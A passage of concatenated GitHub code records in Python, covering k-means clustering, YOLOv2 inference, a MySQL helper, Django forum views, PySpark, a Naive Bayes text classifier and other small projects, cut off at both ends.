'--prefix', dest='prefix', default=\"--\",\n help=\"The identifying prefix of the data (object nickname or \"\\\n \"proposal ID). [--]\")\n\n parser.add_argument('-l', '--length', dest='t_length', default=30,\n type=type_positive_int,\n help=\"Number of time bins to plot on either side of 0. [30]\")\n\n args = parser.parse_args()\n\n # print(\"Input file: %s\" % args.ccf_table)\n\n main(args.ccf_table, args.plot_file, args.prefix, t_len=args.t_length)\n\t\n################################################################################\n","repo_name":"abigailStev/cross_correlation","sub_path":"plot_multi.py","file_name":"plot_multi.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"}
+{"seq_id":"28661715757","text":"'''\nAku membaca detail latihan yang sudah ia catatkan untukku:\n\nDataset ini merupakan data customer suatu mall dan berisi basic informasi customer berupa : CustomerID, age, gender, annual income, dan spending score. Adapun tujuan dari clustering adalah untuk memahami customer - customer mana saja yang sering melakukan transaksi sehingga informasi ini dapat diberikan kepada marketing team untuk membuat strategi promosi yang sesuai dengan karakteristik customer.\n\n \n\n“Kita akan melakukan segmentasi customer, dengan memanfaatkan fungsi KMeans dari Scikit-Learn.cluster. Silakan berlatih dengan intruksi di catatan tadi ya, Aksara.”\n\nAku membuka kembali catatan yang berisi intruksi Senja:\n\nImport pandas sebagai aliasnya dan KMeans dari sklearn.cluster.\nLoad dataset 'https://storage.googleapis.com/dqlab-dataset/pythonTutorial/mall_customers.csv' dan beri nama dataset\nDiasumsikan EDA dan preprocessing sudah dilakukan, selanjutnya kita memilih feature yang akan digunakan untuk membuat model yaitu annual_income dan spending_score. Assign dataset dengan feature yang sudah dipilih ke dalam 'X'. Pada dasarnya terdapat teknik khusus yang dilakukan untuk menyeleksi feature - feature (Feature Selection) mana saja yang dapat digunakan untuk machine learning modelling, karena tidak semua feature itu berguna. Beberapa feature justru bisa menyebabkan performansi model menurun. Tetapi untuk problem ini, secara default kita akan menggunakan annual_income dan spending_score.\nDeklarasikan KMeans( ) dengan nama cluster_model dan gunakan n_cluster = 5. n_cluster adalah argumen dari fungsi KMeans( ) yang merupakan jumlah cluster/centroid (K). random_state = 24.\nGunakan fungsi .fit_predict( ) dari cluster_model pada 'X' untuk proses clustering.\n'''\n#import library\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n# load dataset\ndataset = pd.read_csv(\n 'https://storage.googleapis.com/dqlab-dataset/pythonTutorial/mall_customers.csv')\n\n# selecting features\nX = dataset[['annual_income', 'spending_score']]\n\n# Define KMeans as cluster_model\ncluster_model = KMeans(n_clusters=5, random_state=24)\nlabels = cluster_model.fit_predict(X)\n\n\n'''\nInspect & Visualizing the Cluster\n“Satu lagi, Aksara kalau sudah membuat cluster, tolong visualisasikan hasil dari clustering yang telah kamu lakukan sebelumnya ya. Langkah-langkahnya sudah saya email,” tambah Senja lagi tepat saat aku sedang membuka pesan berisi intruksi tambahan darinya:\n\nPertama - tama, import matplotlib.pyplot dan beri inisial plt.\nGunakan fungsi .values untuk mengubah tipe ‘X’ dari dataframe menjadi array\nPisahkan X kedalam xs dan ys, di mana xs adalah Kolom index [0] dan ys adalah kolom index [1]\nBuatlah scatter plot plt.scatter() dari xs dan ys, kemudian tambahkan c = labels untuk secara otomatis memberikan warna yang berbeda pada setiap cluster, dan alpha = 0.5 ke dalam scatter plot argumen.\nHitunglah koordinat dari centroid menggunakan .cluster_centers_ dari cluster_model, deklarasikan ke dalam variabel centroids.\nPisahkan centroids kedalam centroids_x dan centroids_y, di mana centroids_x adalah kolom index [0] dan centroids_y adalah kolom index [1]\nBuatlah scatter plot dari centroids_x dan centroids_y , gunakan ‘D’ (diamond) sebagai marker parameter, dengan ukuran 50, s = 50\n'''\n\n#import library\n\n# convert dataframe to array\nX = X.values\n# Separate X to xs and ys --> use for chart axis\nxs = X[:, 0]\nys = X[:, 1]\n# Make a scatter plot of xs and ys, using labels to define the colors\nplt.scatter(xs, ys, c=labels, alpha=0.5)\n\n# Assign the cluster centers: centroids\ncentroids = cluster_model.cluster_centers_\n# Assign the columns of centroids: centroids_x, centroids_y\ncentroids_x = centroids[:, 0]\ncentroids_y = centroids[:, 1]\n# Make a scatter plot of centroids_x and centroids_y\nplt.scatter(centroids_x, centroids_y, marker='D', s=50)\nplt.title('K Means Clustering', fontsize=20)\nplt.xlabel('Annual Income')\nplt.ylabel('Spending Score')\nplt.show()\n","repo_name":"AldiMuhammadFarhan/Kodingan_Python","sub_path":"K-MeansClusteringPraktek.py","file_name":"K-MeansClusteringPraktek.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"43352141910","text":"import tkinter as gui\r\nfrom tkinter import ttk\r\n\r\n\r\ndef buscar(a, conexion, cnxn, tree):\r\n\r\n b = conexion.buscar(cnxn, a.get())\r\n tree.delete(*tree.get_children())\r\n\r\n tree.heading('#0', text='Nickname')\r\n tree.heading('correo', text='Correo')\r\n\r\n for c in b:\r\n tree.insert('',gui.END, text = c[0], values=(c[1]))\r\n \r\n\r\ndef informacion(cuadro1, usuario, correo, tree, conexion, cnxn):\r\n\r\n cuadro1.columnconfigure(0, weight = 4)\r\n cuadro1.columnconfigure(1, weight = 4)\r\n cuadro1.columnconfigure(2, weight = 0)\r\n\r\n labelCuadro1 = ttk.Label(cuadro1, text = 'Nickname: ' + usuario[1])\r\n labelCuadro1.grid(column = 0, row = 0, sticky = gui.W)\r\n\r\n labelCuadro2 = ttk.Label(cuadro1, text = 'Correo: ' + correo)\r\n labelCuadro2.grid(column = 1, row = 0, sticky = gui.W)\r\n\r\n a = ttk.Entry(cuadro1)\r\n a.grid(column = 0, row = 1, sticky = gui.W)\r\n\r\n b = ttk.Button(cuadro1, text = 'buscar', command = lambda: buscar(a, conexion, cnxn, tree))\r\n b.grid(column = 1, row = 1, sticky = gui.W)\r\n\r\n tree.grid(column = 0, row = 2)\r\n\r\nif __name__ == '__informacion__':\r\n informacion()\r\n","repo_name":"RomanFloresM/tkinter-connect-with-sql","sub_path":"tkinter connect with sql/py/frames/informacion.py","file_name":"informacion.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"74107352300","text":"import tensorflow as tf\nimport math\nimport numpy as np\nimport random\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom PIL import Image\nfrom tensorflow.python.platform import gfile\n\nINPUTE_SIZE = 416\nCLASS_NUM = 1\nCELL_NUM = 13\nANCHOR_NUM = 5\nTHRESHOLD = 0.3\nOVERLAP_THRESHOLD = 0.5\n\nclass BoundingBox():\n def __init__(self, x, y, w, h, confidence, classes):\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.confidence = confidence\n self.classes = classes\n\nclass BoundingBoxPosition():\n def __init__(self, left, right, top, bottom):\n self.left = left\n self.right = right\n self.top = top\n self.bottom = bottom\n\n\ndef fill_image(img, inputSize):\n img_w, img_h = img.shape[1], img.shape[0]\n w, h = inputSize\n\n new_w = int(img_w * min(w/img_w, h/img_h))\n new_h = int(img_h * min(w/img_w, h/img_h))\n resized_image = cv2.resize(img, (new_w, new_h), interpolation=cv2.INTER_CUBIC)\n\n canvas = np.full((inputSize[1], inputSize[0], 3), 128)\n canvas[(h-new_h)//2:(h-new_h)//2 + new_h,(w-new_w)//2:(w-new_w)//2 + new_w, :] = resized_image\n \n return canvas\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\ndef softmax(x):\n summ = 0\n params = np.zeros(len(x))\n for i in range(len(x)):\n params[i] = math.exp(x[i])\n summ += math.exp(x[i])\n if(np.isnan(summ) or summ<0):\n for i in range(len(x)):\n params[i] = 1 / len(x)\n else:\n for i in range(len(x)):\n params[i] = params[i] / summ\n return params\n\ndef argmax(params):\n maxIndex = 0\n for i in range(len(params)):\n if (params[maxIndex] < params[i]):\n maxIndex = i\n return maxIndex, params[maxIndex]\n\nanchors = [0.672, 0.856, 0.406, 0.73866667, 0.898, 0.92168675, 0.268, 0.4024024, 0.59, 0.55466667]\ndef getAnchorBox(tensorFlowOutput, cellCol, cellRow, box, numClass, offset):\n x = (cellCol + sigmoid(tensorFlowOutput[offset])) * 32\n y = (cellRow + sigmoid(tensorFlowOutput[offset+1])) * 32\n w = math.exp(tensorFlowOutput[offset+2]) * anchors[2*box] * 32\n h = math.exp(tensorFlowOutput[offset+3]) * anchors[2*box + 1] * 32\n confidence = sigmoid(tensorFlowOutput[offset+4])\n classes = []\n for i in range(numClass):\n classes.append(tensorFlowOutput[i+offset+5])\n return BoundingBox(x, y, w, h, confidence, classes)\n\ndef getBestBoundingBox(bbox):\n label, param = argmax(softmax(bbox.classes))\n confidenceOfClass = param * bbox.confidence\n if (confidenceOfClass > THRESHOLD):\n tempLeft = bbox.x - bbox.w/2\n tempTop = bbox.y - bbox.h/2\n tempRight = tempLeft + bbox.w\n tempBottom = tempTop + bbox.h\n\n left = min(tempLeft, tempRight)\n right = max(tempLeft, tempRight)\n top = min(tempTop, tempBottom)\n bottom = max(tempTop, tempBottom)\n return [confidenceOfClass, BoundingBoxPosition(left, right, top, bottom), label]\n else:\n return None\n\n\ndef isOverlap(firstPosition, secondPosition):\n return ((firstPosition.leftsecondPosition.left) \n and (firstPosition.topsecondPosition.top))\n\ndef calculateIoU(firstPosition, secondPosition):\n if(isOverlap(firstPosition, secondPosition)):\n firstPositionArea = abs(firstPosition.right-firstPosition.left) * abs(firstPosition.bottom-firstPosition.top)\n secondPositionArea = abs(secondPosition.right-secondPosition.left) * abs(secondPosition.bottom-secondPosition.top)\n intersectionArea = (max(0, min(firstPosition.right, secondPosition.right)-max(firstPosition.left, secondPosition.left)) * \n max(0, min(firstPosition.bottom, secondPosition.bottom)-max(firstPosition.top, secondPosition.top)))\n\n unionArea = firstPositionArea + secondPositionArea - intersectionArea\n return intersectionArea / unionArea\n else:\n return 0\n\ndef NonMaximumSuppression(bboxes):\n bboxes = sorted(bboxes)\n positions = [position[1] for position in bboxes] # get position object\n outputBoxes = []\n if(len(positions)>0):\n bestBox = positions.pop()\n outputBoxes.append(bestBox)\n for _ in range(len(positions)):\n secondaryBox = positions.pop()\n overlap = False\n for firstBox in outputBoxes:\n overlap = overlap or (calculateIoU(firstBox, secondaryBox) > OVERLAP_THRESHOLD)\n if(not overlap):\n outputBoxes.append(secondaryBox)\n return outputBoxes\n return outputBoxes\n\n\n\nmodel = './yolov2_dog.pb'\noriginImage = Image.open('image/testImage.jpg')\n\n\noriginImage = np.array(originImage)\nresizeImage = fill_image(originImage, [INPUTE_SIZE, INPUTE_SIZE])\nimage = resizeImage[np.newaxis, :, :, :]\nimage = (image-128)/128.0\n\nwith tf.Session() as sess:\n with gfile.FastGFile(model, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='')\n\n x = sess.graph.get_tensor_by_name('input:0')\n y = sess.run(sess.graph.get_tensor_by_name('output:0'), {x: image})\n\npositionList = []\nfor cellRow in range(CELL_NUM):\n for cellCol in range(CELL_NUM):\n offset = 0\n for box in range(ANCHOR_NUM):\n cell = y[0, cellRow, cellCol, :]\n boundingBox = getAnchorBox(cell, cellCol, cellRow, box, CLASS_NUM, offset)\n boundingBoxPosition = getBestBoundingBox(boundingBox)\n if boundingBoxPosition != None:\n positionList.append(boundingBoxPosition)\n offset = offset + 5 + CLASS_NUM \n\nrecognation = NonMaximumSuppression(positionList)\n\n\nplt.imshow(resizeImage)\ncurrentAxis = plt.gca()\nfor i in range(len(recognation)):\n rectangle = patches.Rectangle((recognation[i].left, recognation[i].top), (recognation[i].right-recognation[i].left), \n (recognation[i].bottom-recognation[i].top), \n linewidth=1, edgecolor='r', facecolor='none')\n currentAxis.add_patch(rectangle)\nplt.show()\n","repo_name":"andy1000335/get_YOLOv2_output","sub_path":"YOLOv2.py","file_name":"YOLOv2.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11715259217","text":"from mysql import connector\nimport os\n\n\nclass Database:\n # 1. connectie openen met classe variabelen voor hergebruik\n @staticmethod\n def __open_connection():\n try:\n configFile = \"../configdb.py\"\n \n db = connector.connect(option_files=os.path.abspath(os.path.join(\n os.path.dirname(__file__), configFile)), autocommit=False)\n\n if \"AttributeError\" in (str(type(db))):\n raise Exception(\"foutieve database parameters in config\")\n\n cursor = db.cursor(dictionary=True, buffered=True)\n\n return db, cursor\n\n except connector.Error as err:\n if err.errno == connector.errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"\\nACCES DENIED!\\n\")\n\n elif err.errno == connector.errorcode.ER_BAD_DB_ERROR:\n print(\"\\nDATABASE NOT FOUND\\n\")\n\n else:\n print(err)\n\n return\n\n # 2. Executes READS\n @staticmethod\n def get_rows(sqlQuery, params=None):\n result = None\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n result = cursor.fetchall()\n cursor.close()\n\n if (result is None):\n print(ValueError(f\"Resultaten zijn onbestaand.[DB Error]\"))\n db.close()\n\n except Exception as error:\n print(error) # development boodschap\n result = None\n\n finally:\n return result\n\n @staticmethod\n def get_one_row(sqlQuery, params=None):\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n result = cursor.fetchone()\n cursor.close()\n\n if (result is None):\n raise ValueError(\"Resultaten zijn onbestaand.[DB Error]\")\n\n except Exception as error:\n print(error) # development boodschap\n result = None\n\n finally:\n db.close()\n return result\n\n # 3. Executes INSERT, UPDATE, DELETE with PARAMETERS\n @staticmethod\n def execute_sql(sqlQuery, params=None):\n result = None\n db, cursor = Database.__open_connection()\n try:\n cursor.execute(sqlQuery, params)\n db.commit()\n result = cursor.lastrowid\n if result != 0:\n result = result\n\n else:\n if cursor.rowcount == -1:\n raise Exception(\"Fout in SQL\")\n\n elif cursor.rowcount == 0:\n result = 0\n\n elif result == \"undefined\":\n raise Exception(\"SQL error\")\n else:\n result = cursor.rowcount\n\n except connector.Error as error:\n db.rollback()\n result = None\n print(f\"Error: Data niet bewaard.{error.msg}\")\n\n finally:\n cursor.close()\n db.close()\n return result\n","repo_name":"MathiasDeHerdt/TempoTrackingBrugge","sub_path":"Backend/repo/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"72151347500","text":"from pyspark import SparkConf, SparkContext\n\n# create objects\nconf = SparkConf().setMaster(\"local\").setAppName(\"MostPopMovie\")\nsc = SparkContext(conf = conf)\n\n# define function \ndef parseLine(line):\n fields = line.split(',')\n movieID = fields[1]\n return (movieID)\n\n# import the data\nlines = sc.textFile(\"file:///SparkCourse/ml-100k/u.data\")\n# parse data by calling parseLine function\nmovies = lines.map(lambda x: (int(x.split()[1]), 1))\n\nmostWatched = movies.reduceByKey(lambda x, y: x + y)\n\n\nresults = mostWatched.collect();\n\nfor result in results:\n print(result)\n","repo_name":"brokerstir/PySpark","sub_path":"most-pop-movie.py","file_name":"most-pop-movie.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"18525394849","text":"from django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic.list_detail import object_list\nfrom django.views.generic.create_update import create_object\nfrom django import newforms as forms\nfrom forum.models import Topic, Post, Forum\nfrom sorted_paginated_authored_archived_list_view.views import sorted_paginated_authored_archived_list\nfrom django.conf import settings\n\ndef topic_list(request, slug=None, username=None, sort_field=None, paginate_by=10):\n base_url = '/forum/topics/'\n template_name = None\n extra_context = dict()\n filter = dict()\n if slug != None:\n base_url = \"/forum/\" + slug + \"/\"\n template_name = 'forum/forum_topic_list.html'\n forum = Forum.objects.get(slug=slug)\n sort_field = '-sticky'\n extra_context = dict(forum=forum)\n filter = dict(forum__slug=slug, state=settings.STATE_PUBLISHED)\n return sorted_paginated_authored_archived_list(request, Topic, base_url, username=username, sort_field=sort_field, paginate_by=paginate_by, filter=filter, extra_context=extra_context, template_name=template_name)\n\ndef topic_form(request, slug):\n forum = Forum.objects.get(slug=slug)\n return create_object(request, Topic, login_required='true', extra_context={'forum': forum, 'STATE_DEFAULT': settings.STATE_DEFAULT})\n\ndef post_list(request, topic_id=None, username=None, sort_field=None, paginate_by=10):\n base_url = '/forum/posts/'\n template_name = None\n extra_context = dict()\n filter = dict()\n if topic_id:\n base_url = '/forum/topic/'+topic_id+'/'\n template_name = 'forum/topic_post_list.html'\n topic = Topic.objects.get(id=topic_id)\n sort_field = 'pub_date'\n extra_context = dict(topic=topic)\n filter = dict(topic__id=topic_id, state=settings.STATE_PUBLISHED)\n return sorted_paginated_authored_archived_list(request, Post, base_url, username=username, sort_field=sort_field, paginate_by=paginate_by, filter=filter, extra_context=extra_context, template_name=template_name)\n\ndef post_form(request, topic_id):\n topic = Topic.objects.get(id=topic_id)\n if topic.locked:\n return HttpResponseRedirect(\"/forum/topic/%d\" % topic.id)\n if int(topic.state) != settings.STATE_PUBLISHED:\n return HttpResponseRedirect(\"/forum/topic/%d\" % topic.id)\n return create_object(request, Post, login_required='true', extra_context={'topic': topic, 'STATE_DEFAULT': settings.STATE_DEFAULT})\n","repo_name":"sujithnara/django-simpleforum","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"72272793579","text":"from pathlib import Path\n\nimport ipywidgets as widgets\nfrom bs4 import BeautifulSoup\nfrom IPython.display import HTML, clear_output, display\n\nimport __main__\n\n\nclass Preview:\n selected_user = None\n\n @staticmethod\n def render(page, user):\n content = BeautifulSoup(page.render(user), \"html.parser\")\n template = Path(__file__).parent.joinpath(\"data\", \"preview.html\")\n\n with open(template, \"r\", encoding=\"utf-8\") as template_file:\n template = BeautifulSoup(template_file, \"html.parser\")\n\n anchor = template.select_one(\"page-preview\")\n anchor.insert_after(content)\n anchor.decompose()\n\n return str(template)\n\n @staticmethod\n def display(page):\n users = vars(__main__)[\"users\"]\n\n if hasattr(users, \"name_column\"):\n if isinstance(users.name_column, str):\n mails = (\n users[users.name_column] + \" <\" + users[users.email_column] + \">\"\n )\n else:\n mails = (\n users.loc[:, users.name_column].apply(\" - \".join, 1)\n + \" <\"\n + users[users.email_column]\n + \">\"\n )\n else:\n mails = users[users.email_column]\n\n user_select = widgets.Dropdown(\n options=list(mails), description=\"Preview as:\", layout={\"flex\": \"1 1 100%\"}\n )\n reload_button = widgets.Button(description=\" Reload\", icon=\"rotate-right\")\n controls = widgets.HBox([user_select, reload_button])\n Preview.selected_user = users.loc[mails == user_select.value].iloc[0]\n\n def update():\n user_select.disabled = True\n reload_button.disabled = True\n user = users.loc[mails == user_select.value].iloc[0]\n Preview.selected_user = user\n render = Preview.render(page, user)\n\n clear_output()\n display(controls)\n display(HTML(render))\n\n user_select.disabled = False\n reload_button.disabled = False\n\n @user_select.observe\n def on_change_user(change):\n if change[\"type\"] >= \"change\" and change[\"name\"] >= \"value\":\n update()\n\n @reload_button.on_click\n def on_reload(button):\n update()\n\n update()\n","repo_name":"FelixLuciano/pypers","sub_path":"src/Preview.py","file_name":"Preview.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"}
+{"seq_id":"5442082375","text":"#!/usr/bin/env python3\nfrom gsuite.spreadsheet import Spreadsheet\nfrom gsuite.service_connection import connect_service\n\nSPREADSHEET_ID = \"1Q3n6HDCsCFpChaiHA2s_wFRoIuJ0_hsOurPvfq4eRXI\"\nRANGE = \"test_sheet_1!A1:B11\"\n\n\ndef get_data_from_gsheet(service, spreadsheetId, range):\n\n sheet_data = service.spreadsheets().values().get(\n spreadsheetId=spreadsheetId, range=range).execute()\n\n return sheet_data\n\n\nservice = connect_service()\ntest_data = get_data_from_gsheet(\n service=service, spreadsheetId=SPREADSHEET_ID, range=RANGE)\n\ntest_spreadsheet = Spreadsheet(client=service, spreadsheetId=SPREADSHEET_ID)\n\n\nfor sheet in test_spreadsheet.sheets:\n print(sheet.title)\n\nelements = test_spreadsheet.sheets[0]._sheet.get(\"pageElements\")\nprint(elements)\n","repo_name":"samgaudet/public-python","sub_path":"gsuite/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"6706148344","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/5 14:46\n# @Author : Z\n# @Email : S\n# @File : 14.1MatplotlibDemo.py\nimport matplotlib as pl\n# 1.打印Matplotlib版本\nprint(pl.__version__) #2.2.2\n#2.绘制y=x+5和y=2x+5两条曲线\nimport numpy as np\nimport matplotlib.pyplot as plt\nx=np.linspace(1,10,50)\ny1=x+5\ny2=2*x+5\nplt.plot(x,y1)\nplt.plot(x,y2)\nplt.title(u\"This is y=X 函数\",fontproperties=\"SimHei\")\nplt.savefig(\"sen.jpg\")\n#显示\nplt.show()","repo_name":"OrriO/jupyter_myworkspace","sub_path":"ebook/machinelearningdemo/MachineLearningLessonPro/Python_3/14.1MatplotlibDemo.py","file_name":"14.1MatplotlibDemo.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"17669743508","text":"#coding=utf-8\nimport numpy as np\nimport tifffile as tiff\nimport crf_c as crf\nimport cv2\nimport calF2\n\nFILE_biaozhu = '/home/lenovo/2Tdisk/Wkyao/_/biaozhu_1110.tif' #fusai标注文件\nlabel = tiff.imread(FILE_biaozhu)\nimg_file1 = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/vgg_1111_4.tif'\nimg1 = tiff.imread(img_file1)\nimg_file2 = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/vgg_1111_3.tif'\nimg2 = tiff.imread(img_file2)\n\nFILE_new_2017 = '/home/lenovo/2Tdisk/Wkyao/_/20171105_quarterfinals/quarterfinals_2017.tif'\nnew_2017 = tiff.imread(FILE_new_2017).transpose([1, 2, 0])\nimg17_1 = new_2017[:, :, 2]\nimg17_2 = new_2017[:, :, 3]\nimg17 = (img17_1 + img17_2) / 2\n# 3 4 通道融合.\n\n# F1 = calF2.caltp(label, img1)\n# F2 = calF2.caltp(label, img2)\nF1 = 632584\nF2 = 558045\nw1 = float(F1) / (F1 + F2)\nw2 = float(F2) / (F1 + F2)\nprint (w1, w2)\n\n\nvgg_3_npy = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/softmax_vgg_1111_3.npy'\nvgg_4_npy = '/home/lenovo/2Tdisk/Wkyao/_/2017/vgg/softmax_vgg_1111_4.npy'\n\nvggnpy3 = np.load(vgg_3_npy)\nvggnpy4 = np.load(vgg_4_npy)\n\n\ndef open_and_close(img):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (11, 11))\n # 闭运算\n # img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n # 开运算\n # img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n # 膨胀\n img = cv2.dilate(img, kernel)\n return img\n\n\nmergesoftmax = w1 * vggnpy3 + w2 * vggnpy4\nnp.save('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.npy', mergesoftmax)\nmerge = np.argmax(mergesoftmax, 0).astype(np.uint8)\ntiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.tif', merge)\n\nsoftmax_merge = np.load('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/1111merge.npy')\nmerge_list = []\nim_2017_list = []\nfor i in range(25):\n m = softmax_merge[:, :, i * 600:i * 600 + 600]\n merge_list.append(m)\n b = img17[:, i * 600:i * 600 + 600]\n b = np.array([np.array([b for i in range(3)])])\n b = b.transpose(0, 2, 3, 1)\n im_2017_list.append(b)\nmerge_list.append(softmax_merge[:, :, 15000:15106])\nim_2017_list.append(\n np.array([np.array([img17[:, 15000:15106] for i in range(3)])]).transpose(0, 2, 3, 1))\n\nallImg_crf = []\nallImg_soft = []\n\nfor n, im_2017_part in enumerate(im_2017_list):\n# 使用crf:\n soft = merge_list[n]\n im_2017_mean = np.mean(im_2017_list[n], axis=0)\n c = crf.crf(im_2017_mean, soft)\n allImg_crf.append(c) # 保存整张crf图.\n Crf = np.concatenate(tuple(allImg_crf), axis=1)\n#tiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/crf_merge_1108.tif', Crf)\nimg = open_and_close(Crf) #膨胀操作\ntiff.imsave('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/tp_vggmerge_1111.tif', img)\nmerge_img = tiff.imread('/home/lenovo/2Tdisk/Wkyao/_/2017/merge/tp_vggmerge_1111.tif')\nF1_merge = calF2.caltp(label, merge_img)\nprint (F1, F2, F1_merge)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jiachen0212/-Rank09-","sub_path":"caltp.py","file_name":"caltp.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"}
+{"seq_id":"18953599986","text":"from BayesClassifier import Bayes\nimport numpy as np\nimport os\nimport argparse\nfrom collections import Counter\nfrom tf_idf import TfIdf\nimport preprocess\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"testratio\", type=float, help=\"percentage of data to be used for testing\")\nparser.add_argument(\"datapath\", type=str, help=\"path to folder containint training data\")\nparser.add_argument(\"keepratio\", type=float, help=\"ratio of features to use, scored by tf-idf\")\n\n\ndef load_data(dirFolder, testRatio, featureKeepRatio=1.0):\n classes = sorted(os.listdir(dirFolder))\n vocabulary = set()\n cMap = {i:classes[i] for i in range(len(classes))}\n allDocs = []\n for i, dclass in enumerate(classes):\n documents = os.listdir(os.path.join(dirFolder, dclass))\n np.random.shuffle(documents)\n splitPoint = int(testRatio * len(documents))\n trainDocs, testDocs = documents[splitPoint:], documents[:splitPoint]\n allDocs.append([trainDocs, testDocs])\n # Process documents for vocabulary selection\n tfidf = TfIdf(os.path.join(dirFolder, dclass), trainDocs, featureKeepRatio)\n selectedWords = tfidf.selectWords()\n vocabulary = vocabulary | selectedWords\n # Featurize data according to above vocabulary\n vocabulary = list(vocabulary)\n X_train, Y_train = [], []\n X_test, Y_test = [], []\n for i, dclass in enumerate(classes):\n for j in range(len(allDocs[i])):\n for doc in allDocs[i][j]:\n processedFile = preprocess.readFile(os.path.join(os.path.join(dirFolder, dclass), doc))\n words = Counter(processedFile)\n features = [ words.get(w, 0) for w in vocabulary]\n if j == 0:\n X_train.append(features)\n Y_train.append(i)\n else:\n X_test.append(features)\n Y_test.append(i)\n return (X_train, Y_train), (X_test, Y_test)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n (X_train, Y_train), (X_test, Y_test) = load_data(args.datapath, args.testratio, args.keepratio)\n print(\"Vocabulary size:\", len(X_train[0]))\n baCl = Bayes()\n baCl.train(X_train, Y_train)\n confMatrix, acc = baCl.getConfusionMatrix(X_test, Y_test)\n print(confMatrix)\n print(\"Accuracy:\", acc)\n","repo_name":"iamgroot42/IR_assignments","sub_path":"Assignment3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"70481387821","text":"\nfrom scipy.optimize import fsolve\nimport matplotlib.pyplot as plt\nimport math\n\n#Pocetni uslovi\nR = 4700\nh = 9600\ng = 9.81\nv_max = 147.22\nvt = 350\nv = v_max\n\n#Pozicija bombe, D je daljina na koju je bomba pala\ntb = math.sqrt(2 * h / g)\nD = v_max * tb\n\n#Vreme skretanja aviona\ndef t_1(fi):\n\treturn R * fi / v\n\n#Pozicija aviona u datom trenutku\ndef x(t_s, fi, t1):\n\treturn v * math.cos(fi)*(t_s - t1) + R * math.sin(fi)\n\ndef y(t_s, fi, t1):\n\treturn v * math.sin(fi)*(t_s - t1) + R * (1- math.cos(fi))\n\t\n\n\n#Udaljenost na kojoj se avion nalazi u trenutku kada ga udarni talas stigne\ndef d(fi, ts):\n\tt1 = t_1(fi)\n\tx_ts = x(ts, fi, t1)\n\ty_ts = y(ts, fi, t1)\n\treturn math.sqrt((x_ts-D)**2 + y_ts**2 + h**2) \n\n#Poluprecnik udarnog talasa u trenutku t\ndef r(t):\n\treturn vt * (t-tb)\n\t\n\n#Nizovi u kojima cemo cuvati vreme kretanja t i udaljenost d (koliko je avion udaljen od mesta eksplozije)\nniz_t = list()\nniz_d = list()\n\nmaks_fi = 0\n\n#Uzimamo za ugao fi vrednosti 0-pi i racunamo vreme kretanja i udaljenost na kojoj ce se avion nalaziti ukoliko skrene za ugao fi\nfor fi in range(0,round(math.pi*1000)):\n\tfi = fi/1000\n\t\n\tdef func(ts):\n\t\treturn d(fi,ts) - r(ts)\n\t\t\n\troot = fsolve(func, 10)\n\tif(root[0] - t_1(fi) <= 0):\n\t\tniz_t.append(root[0])\n\t\tniz_d.append(r(root[0]))\n\t\tmaks_d = r(root[0])\n\t\tprint(maks_d)\n\t\tprint(fi)\n\t\tfor fi_2 in range(round(fi*1000),round(math.pi*1000)):\n\t\t\tfi = 